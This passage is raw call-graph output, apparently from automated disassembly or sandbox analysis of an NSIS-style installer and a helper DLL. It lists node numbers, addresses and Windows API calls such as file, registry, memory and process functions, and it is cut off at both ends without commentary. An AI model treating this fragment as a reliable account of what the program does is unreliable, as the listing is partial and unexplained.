6eb8131b GlobalAlloc lstrcpynW 5151->5152 5153 6eb81355 GlobalFree 5151->5153 5152->5153 5153->5054 5155 6eb8169f lstrcpyW 5154->5155 5156 6eb81672 wsprintfW 5154->5156 5159 6eb816b8 5155->5159 5156->5159 5159->5061 5161 6eb82626 5160->5161 5162 6eb81931 5160->5162 5161->5162 5163 6eb82642 GlobalFree 5161->5163 5162->5067 5162->5068 5163->5161 5165 6eb81312 2 API calls 5164->5165 5166 6eb815fe 5165->5166 5166->5070 5167->5074 5168->5077 5170 6eb8164d 5169->5170 5170->5098 5177 6eb812bb GlobalAlloc 5171->5177 5173 6eb812db lstrcpynW 5173->5094 5174->5105 5175->5095 5176->5100 5177->5173 5179 6eb81361 5178->5179 5180 6eb812cc 2 API calls 5179->5180 5181 6eb8137f 5180->5181 5181->5107 5183 6eb82808 5182->5183 5184 6eb827b2 VirtualAlloc 5182->5184 5183->5115 5184->5183 5186 6eb82b4d 5185->5186 5187 6eb82b5d 5186->5187 5188 6eb82b52 GetLastError 5186->5188 5187->5120 5188->5187 5189->5143 5191 6eb8138a 5190->5191 5192 6eb813ac 5190->5192 5191->5192 5193 6eb81390 lstrcpyW 5191->5193 5192->5143 5193->5192 5194->5148 5467 402b59 5468 402b60 5467->5468 5469 402bab 5467->5469 5470 402ba9 5468->5470 5473 402d84 17 API calls 5468->5473 5471 4068d4 5 API calls 5469->5471 5472 402bb2 5471->5472 5474 402da6 17 API calls 5472->5474 5475 402b6e 5473->5475 5476 402bbb 5474->5476 5477 402d84 17 API calls 5475->5477 5476->5470 5478 402bbf IIDFromString 5476->5478 5480 402b7a 5477->5480 5478->5470 5479 402bce 5478->5479 5479->5470 5485 406507 lstrcpynW 5479->5485 5484 40644e wsprintfW 5480->5484 5482 402beb CoTaskMemFree 5482->5470 5484->5470 5485->5482 5486 402a5b 5487 402d84 17 API calls 5486->5487 5488 402a61 5487->5488 5489 402aa4 5488->5489 5490 402a88 5488->5490 5499 40292e 5488->5499 5491 402abe 5489->5491 5492 402aae 5489->5492 5493 402a8d 5490->5493 5494 402a9e 5490->5494 5496 406544 17 API calls 5491->5496 5495 402d84 17 API calls 5492->5495 5500 406507 lstrcpynW 5493->5500 5501 40644e wsprintfW 5494->5501 5495->5499 5496->5499 5500->5499 5501->5499 5195 40175c 5196 402da6 17 API calls 5195->5196 5197 401763 5196->5197 5198 406026 2 API calls 5197->5198 5199 40176a 5198->5199 5200 406026 2 API calls 5199->5200 5200->5199 5502 401d5d 5503 402d84 17 API calls 5502->5503 5504 401d6e SetWindowLongW 5503->5504 5505 402c2a 5504->5505 5506 4054dd 5507 405501 5506->5507 5508 4054ed 5506->5508 5511 405509 IsWindowVisible 5507->5511 5517 405520 5507->5517 5509 4054f3 5508->5509 5510 40554a 5508->5510 5513 4044af SendMessageW 5509->5513 5512 40554f CallWindowProcW 5510->5512 5511->5510 5514 405516 5511->5514 5515 4054fd 5512->5515 5513->5515 5516 404e1e 5 API calls 5514->5516 5516->5517 5517->5512 5518 404e9e 4 API calls 5517->5518 5518->5510 5201 401ede 5202 402d84 17 API calls 5201->5202 5203 401ee4 5202->5203 5204 402d84 17 API calls 5203->5204 5205 401ef0 5204->5205 5206 401f07 EnableWindow 5205->5206 5207 401efc ShowWindow 5205->5207 5208 402c2a 5206->5208 5207->5208 5519 4028de 5520 4028e6 5519->5520 5521 4028ea FindNextFileW 5520->5521 5524 4028fc 5520->5524 5522 402943 5521->5522 5521->5524 5525 406507 lstrcpynW 5522->5525 5525->5524 5533 401563 5534 402ba4 5533->5534 5537 40644e wsprintfW 5534->5537 5536 402ba9 5537->5536 4450 403f64 4451 403f7c 4450->4451 4452 4040dd 4450->4452 4451->4452 4453 403f88 4451->4453 4454 40412e 4452->4454 4455 4040ee GetDlgItem GetDlgItem 4452->4455 4456 403f93 SetWindowPos 4453->4456 4457 403fa6 4453->4457 4459 404188 4454->4459 4469 401389 2 API calls 4454->4469 4523 404463 4455->4523 4456->4457 4461 403ff1 4457->4461 4462 403faf ShowWindow 4457->4462 4515 4040d8 4459->4515 4529 4044af 4459->4529 4466 404010 4461->4466 4467 403ff9 DestroyWindow 4461->4467 4464 4040ca 4462->4464 4465 403fcf GetWindowLongW 4462->4465 4463 404118 KiUserCallbackDispatcher 4526 40140b 4463->4526 4545 4044ca 4464->4545 4465->4464 4471 403fe8 ShowWindow 4465->4471 4472 404015 SetWindowLongW 4466->4472 4473 404026 4466->4473 4477 4043ec 4467->4477 4474 404160 4469->4474 4471->4461 4472->4515 4473->4464 4479 404032 GetDlgItem 4473->4479 4474->4459 4475 404164 SendMessageW 4474->4475 4475->4515 4476 40140b 2 API calls 4512 40419a 4476->4512 4480 40441d ShowWindow 4477->4480 4477->4515 4478 4043ee DestroyWindow EndDialog 4478->4477 4481 404060 4479->4481 4482 404043 SendMessageW IsWindowEnabled 4479->4482 4480->4515 4484 40406d 4481->4484 4485 4040b4 SendMessageW 4481->4485 4486 404080 4481->4486 4494 404065 4481->4494 4482->4481 4482->4515 4483 406544 17 API calls 4483->4512 4484->4485 4484->4494 4485->4464 4489 404088 4486->4489 4490 40409d 4486->4490 4488 404463 18 API calls 4488->4512 4492 40140b 2 API calls 4489->4492 4493 40140b 2 API calls 4490->4493 4491 40409b 4491->4464 4492->4494 4495 4040a4 4493->4495 4542 40443c 4494->4542 4495->4464 4495->4494 4496 404463 18 API calls 4497 404215 GetDlgItem 4496->4497 4498 404232 ShowWindow KiUserCallbackDispatcher 4497->4498 4499 40422a 4497->4499 4532 404485 KiUserCallbackDispatcher 4498->4532 4499->4498 4501 40425c EnableWindow 4506 404270 4501->4506 4502 404275 GetSystemMenu EnableMenuItem SendMessageW 4503 4042a5 SendMessageW 4502->4503 4502->4506 4503->4506 4506->4502 4533 404498 SendMessageW 4506->4533 4534 403f45 4506->4534 4537 406507 lstrcpynW 4506->4537 4508 4042d4 lstrlenW 4509 406544 17 API calls 4508->4509 4510 4042ea SetWindowTextW 4509->4510 4538 401389 4510->4538 4512->4476 4512->4478 4512->4483 4512->4488 4512->4496 4513 40432e DestroyWindow 4512->4513 4512->4515 4513->4477 4514 404348 CreateDialogParamW 4513->4514 4514->4477 4516 40437b 4514->4516 4517 404463 18 API calls 4516->4517 4518 404386 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4517->4518 4519 401389 2 API calls 4518->4519 4520 4043cc 4519->4520 4520->4515 4521 4043d4 ShowWindow 4520->4521 4522 4044af SendMessageW 4521->4522 4522->4477 4524 406544 17 API calls 4523->4524 4525 40446e SetDlgItemTextW 4524->4525 4525->4463 4527 401389 2 API calls 4526->4527 4528 401420 4527->4528 4528->4454 4530 4044c7 4529->4530 4531 4044b8 SendMessageW 4529->4531 4530->4512 4531->4530 4532->4501 4533->4506 4535 406544 17 API calls 4534->4535 4536 403f53 SetWindowTextW 4535->4536 4536->4506 4537->4508 4540 401390 4538->4540 4539 4013fe 4539->4512 4540->4539 4541 4013cb MulDiv SendMessageW 4540->4541 4541->4540 4543 404443 4542->4543 4544 404449 SendMessageW 4542->4544 4543->4544 4544->4491 4546 40458d 4545->4546 4547 4044e2 GetWindowLongW 4545->4547 4546->4515 4547->4546 4548 4044f7 4547->4548 4548->4546 4549 404524 GetSysColor 4548->4549 4550 404527 4548->4550 4549->4550 4551 404537 SetBkMode 4550->4551 4552 40452d SetTextColor 4550->4552 4553 404555 4551->4553 4554 40454f GetSysColor 4551->4554 4552->4551 4555 404566 4553->4555 4556 40455c SetBkColor 4553->4556 4554->4553 4555->4546 4557 404580 CreateBrushIndirect 4555->4557 4558 404579 DeleteObject 4555->4558 4556->4555 4557->4546 4558->4557 5538 401968 5539 402d84 17 API calls 5538->5539 5540 40196f 5539->5540 5541 402d84 17 API calls 5540->5541 5542 40197c 5541->5542 5543 402da6 17 API calls 5542->5543 5544 401993 lstrlenW 5543->5544 5545 4019a4 5544->5545 5546 4019e5 5545->5546 5550 406507 lstrcpynW 5545->5550 5548 4019d5 5548->5546 5549 4019da lstrlenW 5548->5549 5549->5546 5550->5548 5551 40166a 5552 402da6 17 API calls 5551->5552 5553 401670 5552->5553 5554 40683d 2 API calls 5553->5554 5555 401676 5554->5555 5556 402aeb 5557 402d84 17 API calls 5556->5557 5558 402af1 5557->5558 5559 406544 17 API calls 5558->5559 5560 40292e 5558->5560 5559->5560 5561 4026ec 5562 402d84 17 API calls 5561->5562 5564 4026fb 5562->5564 5563 402745 ReadFile 5563->5564 5573 402838 5563->5573 5564->5563 5565 40607a ReadFile 5564->5565 5567 402785 MultiByteToWideChar 5564->5567 5568 40283a 5564->5568 5570 4027ab SetFilePointer MultiByteToWideChar 5564->5570 5571 40284b 5564->5571 5564->5573 5574 4060d8 SetFilePointer 5564->5574 5565->5564 5567->5564 5583 40644e wsprintfW 5568->5583 5570->5564 5572 40286c SetFilePointer 5571->5572 5571->5573 5572->5573 5575 4060f4 5574->5575 5578 40610c 5574->5578 5576 40607a ReadFile 5575->5576 5577 406100 5576->5577 5577->5578 5579 406115 SetFilePointer 5577->5579 5580 40613d SetFilePointer 5577->5580 5578->5564 5579->5580 5581 406120 5579->5581 5580->5578 5582 4060a9 WriteFile 5581->5582 5582->5578 5583->5573 4672 40176f 4673 402da6 17 API calls 4672->4673 4674 401776 4673->4674 4675 401796 4674->4675 4676 40179e 4674->4676 4732 406507 lstrcpynW 4675->4732 4733 406507 lstrcpynW 4676->4733 4679 4017a9 4681 405dd6 3 API calls 4679->4681 4680 40179c 4683 40678e 5 API calls 4680->4683 4682 4017af lstrcatW 4681->4682 4682->4680 4693 4017bb 4683->4693 4684 40683d 2 API calls 4684->4693 4686 405fd2 2 API calls 4686->4693 4687 4017cd CompareFileTime 4687->4693 4688 40188d 4689 405569 24 API calls 4688->4689 4692 401897 4689->4692 4690 405569 24 API calls 4700 401879 4690->4700 4691 406507 lstrcpynW 4691->4693 4711 4032b4 4692->4711 4693->4684 4693->4686 4693->4687 4693->4688 4693->4691 4697 406544 17 API calls 4693->4697 4709 401864 4693->4709 4710 405ff7 GetFileAttributesW CreateFileW 4693->4710 4734 405b67 4693->4734 4696 4018be SetFileTime 4698 4018d0 FindCloseChangeNotification 4696->4698 4697->4693 4699 4018e1 4698->4699 4698->4700 4701 4018e6 4699->4701 4702 4018f9 4699->4702 4703 406544 17 API calls 4701->4703 4704 406544 17 API calls 4702->4704 4705 4018ee lstrcatW 4703->4705 4706 401901 4704->4706 4705->4706 4706->4700 4708 405b67 MessageBoxIndirectW 4706->4708 4708->4700 4709->4690 4709->4700 4710->4693 4712 4032cd 4711->4712 4713 4032f8 4712->4713 4748 4034af SetFilePointer 4712->4748 4738 403499 4713->4738 4717 403315 GetTickCount 4728 403328 4717->4728 4718 403439 4719 40343d 4718->4719 4724 403455 4718->4724 4721 403499 ReadFile 4719->4721 4720 4018aa 4720->4696 4720->4698 4721->4720 4722 403499 ReadFile 4722->4724 4723 403499 ReadFile 4723->4728 4724->4720 4724->4722 4725 4060a9 WriteFile 4724->4725 4725->4724 4727 40338e GetTickCount 4727->4728 4728->4720 4728->4723 4728->4727 4729 4033b7 MulDiv wsprintfW 4728->4729 4731 4060a9 WriteFile 4728->4731 4741 406a4f 4728->4741 4730 405569 24 API calls 4729->4730 4730->4728 4731->4728 4732->4680 4733->4679 4735 405b7c 4734->4735 4736 405bc8 4735->4736 4737 405b90 MessageBoxIndirectW 4735->4737 4736->4693 4737->4736 4739 40607a ReadFile 4738->4739 4740 403303 4739->4740 4740->4717 4740->4718 4740->4720 4742 406a74 4741->4742 4745 406a7c 4741->4745 4742->4728 4743 406b03 GlobalFree 4744 406b0c GlobalAlloc 4743->4744 4744->4742 4744->4745 4745->4742 4745->4743 4745->4744 4746 406b83 GlobalAlloc 4745->4746 4747 406b7a GlobalFree 4745->4747 4746->4742 4746->4745 4747->4746 4748->4713 5591 401a72 5592 402d84 17 API calls 5591->5592 5593 401a7b 5592->5593 5594 402d84 17 API calls 5593->5594 5595 401a20 5594->5595 5596 401573 5597 401583 ShowWindow 5596->5597 5598 40158c 5596->5598 5597->5598 5599 40159a ShowWindow 5598->5599 5600 402c2a 5598->5600 5599->5600 5601 403b74 5602 403b7f 5601->5602 5603 403b83 5602->5603 5604 403b86 GlobalAlloc 5602->5604 5604->5603 5605 4023f4 5606 402da6 17 API calls 5605->5606 5607 402403 5606->5607 5608 402da6 17 API calls 5607->5608 5609 40240c 5608->5609 5610 402da6 17 API calls 5609->5610 5611 402416 GetPrivateProfileStringW 5610->5611 5612 4014f5 SetForegroundWindow 5613 402c2a 5612->5613 5614 6eb8170d 5615 6eb815b6 GlobalFree 5614->5615 5617 6eb81725 5615->5617 5616 6eb8176b GlobalFree 5617->5616 5618 6eb81740 5617->5618 5619 6eb81757 VirtualFree 5617->5619 5618->5616 5619->5616 5620 401ff6 5621 402da6 17 API calls 5620->5621 5622 401ffd 5621->5622 5623 40683d 2 API calls 5622->5623 5624 402003 5623->5624 5626 402014 5624->5626 5627 40644e wsprintfW 5624->5627 5627->5626 4767 4034f7 SetErrorMode GetVersionExW 4768 403581 4767->4768 4769 403549 GetVersionExW 4767->4769 4770 4035da 4768->4770 4771 4068d4 5 API calls 4768->4771 4769->4768 4772 406864 3 API calls 4770->4772 4771->4770 4773 4035f0 lstrlenA 4772->4773 4773->4770 4774 403600 4773->4774 4775 4068d4 5 API calls 4774->4775 4776 403607 4775->4776 4777 4068d4 5 API calls 4776->4777 4778 40360e 4777->4778 4779 4068d4 5 API calls 4778->4779 4780 40361a #17 OleInitialize SHGetFileInfoW 4779->4780 4858 406507 lstrcpynW 4780->4858 4783 403667 GetCommandLineW 4859 406507 lstrcpynW 4783->4859 4785 403679 4786 405e03 CharNextW 4785->4786 4787 40369f CharNextW 4786->4787 4793 4036b0 4787->4793 4788 4037ae 4789 4037c2 GetTempPathW 4788->4789 4860 4034c6 4789->4860 4791 4037da 4794 403834 DeleteFileW 4791->4794 4795 4037de GetWindowsDirectoryW lstrcatW 4791->4795 4792 405e03 CharNextW 4792->4793 4793->4788 4793->4792 4800 4037b0 4793->4800 4870 40307d GetTickCount GetModuleFileNameW 4794->4870 4797 4034c6 12 API calls 4795->4797 4799 4037fa 4797->4799 4798 403847 4801 40390b 4798->4801 4807 405e03 CharNextW 4798->4807 4843 4038fc 4798->4843 4799->4794 4802 4037fe GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4799->4802 4954 406507 lstrcpynW 4800->4954 4959 403adc 4801->4959 4803 4034c6 12 API calls 4802->4803 4806 40382c 4803->4806 4806->4794 4806->4801 4823 403869 4807->4823 4810 403a33 4814 405b67 MessageBoxIndirectW 4810->4814 4811 403a48 4812 403a50 GetCurrentProcess OpenProcessToken 4811->4812 4813 403ac6 ExitProcess 4811->4813 4816 403a96 4812->4816 4817 403a67 LookupPrivilegeValueW AdjustTokenPrivileges 4812->4817 4815 403a40 ExitProcess 4814->4815 4822 4068d4 5 API calls 4816->4822 4817->4816 4819 4038d2 4821 405ede 18 API calls 4819->4821 4820 403913 4824 405ad2 5 API calls 4820->4824 4825 4038de 4821->4825 4826 403a9d 4822->4826 4823->4819 4823->4820 4827 403918 lstrcatW 4824->4827 4825->4801 4955 406507 lstrcpynW 4825->4955 4828 403ab2 ExitWindowsEx 4826->4828 4832 403abf 4826->4832 4829 403934 lstrcatW lstrcmpiW 4827->4829 4830 403929 lstrcatW 4827->4830 4828->4813 4828->4832 4829->4801 4833 403954 4829->4833 4830->4829 4837 40140b 2 API calls 4832->4837 4834 403960 4833->4834 4835 403959 4833->4835 4839 405ab5 2 API calls 4834->4839 4838 405a38 4 API calls 4835->4838 4836 4038f1 4956 406507 lstrcpynW 4836->4956 4837->4813 4841 40395e 4838->4841 4842 403965 SetCurrentDirectoryW 4839->4842 4841->4842 4844 403982 4842->4844 4845 403977 4842->4845 4898 403bb6 4843->4898 4958 406507 lstrcpynW 4844->4958 4957 406507 lstrcpynW 4845->4957 4848 406544 17 API calls 4849 4039c4 DeleteFileW 4848->4849 4850 4039d0 CopyFileW 4849->4850 4855 40398f 4849->4855 4850->4855 4851 403a1a 4853 4062c7 36 API calls 4851->4853 4852 4062c7 36 API calls 4852->4855 4853->4801 4854 406544 17 API calls 4854->4855 4855->4848 4855->4851 4855->4852 4855->4854 4856 405aea 2 API calls 4855->4856 4857 403a04 CloseHandle 4855->4857 4856->4855 4857->4855 4858->4783 4859->4785 4861 40678e 5 API calls 4860->4861 4863 4034d2 4861->4863 4862 4034dc 4862->4791 4863->4862 4864 405dd6 3 API calls 4863->4864 4865 4034e4 4864->4865 4866 405ab5 2 API calls 4865->4866 4867 4034ea 4866->4867 4966 406026 4867->4966 4970 405ff7 GetFileAttributesW CreateFileW 4870->4970 4872 4030bd 4891 4030cd 4872->4891 4971 406507 lstrcpynW 4872->4971 4874 4030e3 4875 405e22 2 API calls 4874->4875 4876 4030e9 4875->4876 4972 406507 lstrcpynW 4876->4972 4878 4030f4 GetFileSize 4879 4031ee 4878->4879 4897 40310b 4878->4897 4973 403019 4879->4973 4881 4031f7 4883 403227 GlobalAlloc 4881->4883 4881->4891 4985 4034af SetFilePointer 4881->4985 4882 403499 ReadFile 4882->4897 4984 4034af SetFilePointer 4883->4984 4885 40325a 4888 403019 6 API calls 4885->4888 4887 403242 4890 4032b4 35 API calls 4887->4890 4888->4891 4889 403210 4892 403499 ReadFile 4889->4892 4895 40324e 4890->4895 4891->4798 4893 40321b 4892->4893 4893->4883 4893->4891 4894 403019 6 API calls 4894->4897 4895->4891 4895->4895 4896 40328b SetFilePointer 4895->4896 4896->4891 4897->4879 4897->4882 4897->4885 4897->4891 4897->4894 4899 4068d4 5 API calls 4898->4899 4900 403bca 4899->4900 4901 403bd0 GetUserDefaultUILanguage 4900->4901 4902 403be2 4900->4902 4986 40644e wsprintfW 4901->4986 4904 4063d5 3 API calls 4902->4904 4906 403c12 4904->4906 4905 403be0 4987 403e8c 4905->4987 4907 403c31 lstrcatW 4906->4907 4908 4063d5 3 API calls 4906->4908 4907->4905 4908->4907 4911 405ede 18 API calls 4912 403c63 4911->4912 4913 403cf7 4912->4913 4915 4063d5 3 API calls 4912->4915 4914 405ede 18 API calls 4913->4914 4916 403cfd 4914->4916 4917 403c95 4915->4917 4918 403d0d LoadImageW 4916->4918 4921 406544 17 API calls 4916->4921 4917->4913 4924 403cb6 lstrlenW 4917->4924 4928 405e03 CharNextW 4917->4928 4919 403db3 4918->4919 4920 403d34 RegisterClassW 4918->4920 4923 40140b 2 API calls 4919->4923 4922 403d6a SystemParametersInfoW CreateWindowExW 4920->4922 4953 403dbd 4920->4953 4921->4918 4922->4919 4927 403db9 4923->4927 4925 403cc4 lstrcmpiW 4924->4925 4926 403cea 4924->4926 4925->4926 4929 403cd4 GetFileAttributesW 4925->4929 4930 405dd6 3 API calls 4926->4930 4933 403e8c 18 API calls 4927->4933 4927->4953 4931 403cb3 4928->4931 4932 403ce0 4929->4932 4934 403cf0 4930->4934 4931->4924 4932->4926 4935 405e22 2 API calls 4932->4935 4936 403dca 4933->4936 4995 406507 lstrcpynW 4934->4995 4935->4926 4938 403dd6 ShowWindow 4936->4938 4939 403e59 4936->4939 4941 406864 3 API calls 4938->4941 4940 40563c 5 API calls 4939->4940 4942 403e5f 4940->4942 4943 403dee 4941->4943 4944 403e63 4942->4944 4945 403e7b 4942->4945 4946 403dfc GetClassInfoW 4943->4946 4948 406864 3 API calls 4943->4948 4952 40140b 2 API calls 4944->4952 4944->4953 4947 40140b 2 API calls 4945->4947 4949 403e10 GetClassInfoW RegisterClassW 4946->4949 4950 403e26 DialogBoxParamW 4946->4950 4947->4953 4948->4946 4949->4950 4951 40140b 2 API calls 4950->4951 4951->4953 4952->4953 4953->4801 4954->4789 4955->4836 4956->4843 4957->4844 4958->4855 4960 403af4 4959->4960 4961 403ae6 CloseHandle 4959->4961 4997 403b21 4960->4997 4961->4960 4964 405c13 67 API calls 4965 403a28 OleUninitialize 4964->4965 4965->4810 4965->4811 4967 406033 GetTickCount GetTempFileNameW 4966->4967 4968 4034f5 4967->4968 4969 406069 4967->4969 4968->4791 4969->4967 4969->4968 4970->4872 4971->4874 4972->4878 4974 403022 4973->4974 4975 40303a 4973->4975 4976 403032 4974->4976 4977 40302b DestroyWindow 4974->4977 4978 403042 4975->4978 4979 40304a GetTickCount 4975->4979 4976->4881 4977->4976 4980 406910 2 API calls 4978->4980 4981 403058 CreateDialogParamW ShowWindow 4979->4981 4982 40307b 4979->4982 4983 403048 4980->4983 4981->4982 4982->4881 4983->4881 4984->4887 4985->4889 4986->4905 4988 403ea0 4987->4988 4996 40644e wsprintfW 4988->4996 4990 403f11 4991 403f45 18 API calls 4990->4991 4993 403f16 4991->4993 4992 403c41 4992->4911 4993->4992 4994 406544 17 API calls 4993->4994 4994->4993 4995->4913 4996->4990 4998 403b2f 4997->4998 4999 403af9 4998->4999 5000 403b34 FreeLibrary GlobalFree 4998->5000 4999->4964 5000->4999 5000->5000 5628 401b77 5629 402da6 17 API calls 5628->5629 5630 401b7e 5629->5630 5631 402d84 17 API calls 5630->5631 5632 401b87 wsprintfW 5631->5632 5633 402c2a 5632->5633 5634 6eb81000 5635 6eb8101b 5 API calls 5634->5635 5636 6eb81019 5635->5636 5637 40167b 5638 402da6 17 API calls 5637->5638 5639 401682 5638->5639 5640 402da6 17 API calls 5639->5640 5641 40168b 5640->5641 5642 402da6 17 API calls 5641->5642 5643 401694 MoveFileW 5642->5643 5644 4016a0 5643->5644 5645 4016a7 5643->5645 5647 401423 24 API calls 5644->5647 5646 40683d 2 API calls 5645->5646 5649 4022f6 5645->5649 5648 4016b6 5646->5648 5647->5649 5648->5649 5650 4062c7 36 API calls 5648->5650 5650->5644 5651 406bfe 5653 406a82 5651->5653 5652 4073ed 5653->5652 5654 406b03 GlobalFree 5653->5654 5655 406b0c GlobalAlloc 5653->5655 5656 406b83 GlobalAlloc 5653->5656 5657 406b7a GlobalFree 5653->5657 5654->5655 5655->5652 5655->5653 5656->5652 5656->5653 5657->5656 5658 4022ff 5659 402da6 17 API calls 5658->5659 5660 402305 5659->5660 5661 402da6 17 API calls 5660->5661 5662 40230e 5661->5662 5663 402da6 17 API calls 5662->5663 5664 402317 5663->5664 5665 40683d 2 API calls 5664->5665 5666 402320 5665->5666 5667 402331 lstrlenW lstrlenW 5666->5667 5671 402324 5666->5671 5669 405569 24 API calls 5667->5669 5668 405569 24 API calls 5672 40232c 5668->5672 5670 40236f SHFileOperationW 5669->5670 5670->5671 5670->5672 5671->5668 5671->5672 5673 4019ff 5674 402da6 17 API calls 5673->5674 5675 401a06 5674->5675 5676 402da6 17 API calls 5675->5676 5677 401a0f 5676->5677 5678 401a16 lstrcmpiW 5677->5678 5679 401a28 lstrcmpW 5677->5679 5680 401a1c 5678->5680 5679->5680 5681 401000 5682 401037 BeginPaint GetClientRect 5681->5682 5684 40100c DefWindowProcW 5681->5684 5685 4010f3 5682->5685 5686 401179 5684->5686 5687 401073 CreateBrushIndirect FillRect DeleteObject 5685->5687 5688 4010fc 5685->5688 5687->5685 5689 401102 CreateFontIndirectW 5688->5689 5690 401167 EndPaint 5688->5690 5689->5690 5691 401112 6 API calls 5689->5691 5690->5686 5691->5690 5692 401d81 5693 401d94 GetDlgItem 5692->5693 5694 401d87 5692->5694 5696 401d8e 5693->5696 5695 402d84 17 API calls 5694->5695 5695->5696 5697 402da6 17 API calls 5696->5697 5699 401dd5 GetClientRect LoadImageW SendMessageW 5696->5699 5697->5699 5700 401e33 5699->5700 5702 401e3f 5699->5702 5701 401e38 DeleteObject 5700->5701 5700->5702 5701->5702 5703 6eb81979 5704 6eb8199c 5703->5704 5705 6eb819d1 GlobalFree 5704->5705 5706 6eb819e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5704->5706 5705->5706 5707 6eb81312 2 API calls 5706->5707 5708 6eb81b6e GlobalFree GlobalFree 5707->5708 5709 401503 5710 40150b 5709->5710 5712 40151e 5709->5712 5711 402d84 17 API calls 5710->5711 5711->5712 5713 402383 5714 40238a 5713->5714 5717 40239d 5713->5717 5715 406544 17 API calls 5714->5715 5716 402397 5715->5716 5716->5717 5718 405b67 MessageBoxIndirectW 5716->5718 5718->5717 5719 402c05 SendMessageW 5720 402c1f InvalidateRect 5719->5720 5721 402c2a 5719->5721 5720->5721 4587 6eb82a7f 4588 6eb82acf 4587->4588 4589 6eb82a8f VirtualProtect 4587->4589 4589->4588 5729 40248a 5730 402da6 17 API calls 5729->5730 5731 40249c 5730->5731 5732 402da6 17 API calls 5731->5732 5733 4024a6 5732->5733 5746 402e36 5733->5746 5736 402c2a 5737 4024de 5741 402d84 17 API calls 5737->5741 5744 4024ea 5737->5744 5738 402da6 17 API calls 5740 4024d4 lstrlenW 5738->5740 5739 402509 RegSetValueExW 5743 40251f RegCloseKey 5739->5743 5740->5737 5741->5744 5742 4032b4 35 API calls 5742->5739 5743->5736 5744->5739 5744->5742 5747 402e51 5746->5747 5750 4063a2 5747->5750 5751 4063b1 5750->5751 5752 4063bc RegCreateKeyExW 5751->5752 5753 4024b6 5751->5753 5752->5753 5753->5736 5753->5737 5753->5738 4662 40290b 4663 402da6 17 API calls 4662->4663 4664 402912 FindFirstFileW 4663->4664 4665 40293a 4664->4665 4669 402925 4664->4669 4666 402943 4665->4666 4670 40644e wsprintfW 4665->4670 4671 406507 lstrcpynW 4666->4671 4670->4666 4671->4669 5754 40190c 5755 401943 5754->5755 5756 402da6 17 API calls 5755->5756 5757 401948 5756->5757 5758 405c13 67 API calls 5757->5758 5759 401951 5758->5759 5760 6eb81774 5761 6eb817a3 5760->5761 5762 6eb81bff 22 API calls 5761->5762 5763 6eb817aa 5762->5763 5764 6eb817bd 5763->5764 5765 6eb817b1 5763->5765 5767 6eb817e4 5764->5767 5768 6eb817c7 5764->5768 5766 6eb81312 2 API calls 5765->5766 5771 6eb817bb 5766->5771 5769 6eb817ea 5767->5769 5770 6eb8180e 5767->5770 5772 6eb815dd 3 API calls 5768->5772 5773 6eb81654 3 API calls 5769->5773 5774 6eb815dd 3 API calls 5770->5774 5775 6eb817cc 5772->5775 5776 6eb817ef 5773->5776 5774->5771 5777 6eb81654 3 API calls 5775->5777 5778 6eb81312 2 API calls 5776->5778 5779 6eb817d2 5777->5779 5780 6eb817f5 GlobalFree 5778->5780 5781 6eb81312 2 API calls 5779->5781 5780->5771 5783 6eb81809 GlobalFree 5780->5783 5782 6eb817d8 GlobalFree 5781->5782 5782->5771 5783->5771 5784 40490d 5785 404943 5784->5785 5786 40491d 5784->5786 5788 4044ca 8 API calls 5785->5788 5787 404463 18 API calls 5786->5787 5789 40492a SetDlgItemTextW 5787->5789 5790 40494f 5788->5790 5789->5785 5791 40190f 5792 402da6 17 API calls 5791->5792 5793 401916 5792->5793 5794 405b67 MessageBoxIndirectW 5793->5794 5795 40191f 5794->5795 5796 6eb823e9 5797 6eb82453 5796->5797 5798 6eb8245e GlobalAlloc 5797->5798 5799 6eb8247d 5797->5799 5798->5797 5800 401491 5801 405569 24 API calls 5800->5801 5802 401498 5801->5802 5803 402891 5804 402898 5803->5804 5805 402ba9 5803->5805 5806 402d84 17 API calls 5804->5806 5807 40289f 5806->5807 5808 4028ae SetFilePointer 5807->5808 5808->5805 5809 4028be 5808->5809 5811 40644e wsprintfW 5809->5811 5811->5805 5812 401f12 5813 402da6 17 API calls 5812->5813 5814 401f18 5813->5814 5815 402da6 17 API calls 5814->5815 5816 401f21 5815->5816 5817 402da6 17 API calls 5816->5817 5818 401f2a 5817->5818 5819 402da6 17 API calls 5818->5819 5820 401f33 5819->5820 5821 401423 24 API calls 5820->5821 5822 401f3a 5821->5822 5829 405b2d ShellExecuteExW 5822->5829 5824 401f82 5825 40697f 5 API calls 5824->5825 5827 40292e 5824->5827 5826 401f9f CloseHandle 5825->5826 5826->5827 5829->5824 5830 402f93 5831 402fa5 SetTimer 5830->5831 5832 402fbe 5830->5832 5831->5832 5833 403013 5832->5833 5834 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5832->5834 5834->5833 5835 401d17 5836 402d84 17 API calls 5835->5836 5837 401d1d IsWindow 5836->5837 5838 401a20 5837->5838 5839 6eb810e1 5845 6eb81111 5839->5845 5840 6eb812b0 GlobalFree 5841 6eb811d7 GlobalAlloc 5841->5845 5842 6eb81240 GlobalFree 5842->5845 5843 6eb8135a 2 API calls 5843->5845 5844 6eb812ab 5844->5840 5845->5840 5845->5841 5845->5842 5845->5843 5845->5844 5846 6eb81312 2 API calls 5845->5846 5847 6eb8129a GlobalFree 5845->5847 5848 6eb8116b GlobalAlloc 5845->5848 5849 6eb81381 lstrcpyW 5845->5849 5846->5845 5847->5845 5848->5845 5849->5845 5850 404599 lstrcpynW lstrlenW 5851 401b9b 5852 401bec 5851->5852 5853 401ba8 5851->5853 5855 401bf1 5852->5855 5856 401c16 GlobalAlloc 5852->5856 5854 401c31 5853->5854 5859 401bbf 5853->5859 5857 406544 17 API calls 5854->5857 5865 40239d 5854->5865 5855->5865 5872 406507 lstrcpynW 5855->5872 5858 406544 17 API calls 5856->5858 5860 402397 5857->5860 5858->5854 5870 406507 lstrcpynW 5859->5870 5860->5865 5866 405b67 MessageBoxIndirectW 5860->5866 5863 401c03 GlobalFree 5863->5865 5864 401bce 5871 406507 lstrcpynW 5864->5871 5866->5865 5868 401bdd 5873 406507 lstrcpynW 5868->5873 5870->5864 5871->5868 5872->5863 5873->5865 5874 40261c 5875 402da6 17 API calls 5874->5875 5876 402623 5875->5876 5879 405ff7 GetFileAttributesW CreateFileW 5876->5879 5878 40262f 5879->5878 5887 40149e 5888 4014ac PostQuitMessage 5887->5888 5889 40239d 5887->5889 5888->5889 5890 40259e 5891 